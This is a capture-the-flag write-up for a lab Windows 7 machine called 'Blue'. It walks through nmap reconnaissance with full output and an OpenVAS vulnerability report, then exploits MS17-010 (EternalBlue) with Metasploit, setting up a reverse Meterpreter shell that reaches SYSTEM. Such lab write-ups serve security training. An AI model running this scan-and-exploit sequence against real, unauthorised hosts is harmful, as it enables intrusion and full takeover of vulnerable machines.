I start by modifying my /etc/hosts file to avoid writing the IP everytime :
10.10.10.40 blueThen I look for open ports with nmap and start an OpenVAS scan:
nmap -p- blue -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-02 10:17 CET
Nmap scan report for blue (10.10.10.40)
Host is up (0.039s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 37.17 secondsNow I can start nmap scripts on the open port to gather more information:
nmap -p135,139,445,49152,49153,49154,49155,49156,49157 -A -Pn blue
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6m09s, deviation: 1s, median: 6m08s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-03-02T09:29:25+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-03-02T09:29:24
|_ start_date: 2021-03-01T14:16:37
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.34 secondsWindows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| Port | Service |
|---|---|
| 135/tcp | msrpc |
| 139/tcp | netbios-ssn |
| 445/tcp | microsoft-ds |
| 49152/tcp | unknown |
| 49153/tcp | unknown |
| 49154/tcp | unknown |
| 49155/tcp | unknown |
| 49156/tcp | unknown |
| 49157/tcp | unknown |
Here are the vulnerabilities found by OpenVAS:
| CVE | Service | Description | Severity |
|---|---|---|---|
| CVE-2017-0143 | SMB | Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389) | High |
| CVE-1999-0519 | SMB | Microsoft Windows SMB/NETBIOS NULL Session Authentication Bypass Vulnerability | High |
| SMB | DCE/RPC and MSRPC Services Enumeration Reporting | Medium |
According to the OpenVAS report, the first vulnerability was disclosed in Microsoft Bulletin MS17-010. A quick search for MS17-010 in metasploit shows that there are exploits available.
I start metasploit with msfconsole and select the exploit with use exploit/windows/smb/ms17_010_eternalblue.
I then configure the following parameters
| Param | Value |
|---|---|
| RHOSTS | 10.10.10.40 |
| LHOST | my IP address |
| LPORT | 4444 |
I launch the attack with exploit and I now have a meterpreter shell with admin privileges:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMThis is it! Retrieving the flag from there is a formality. A piece of cake right?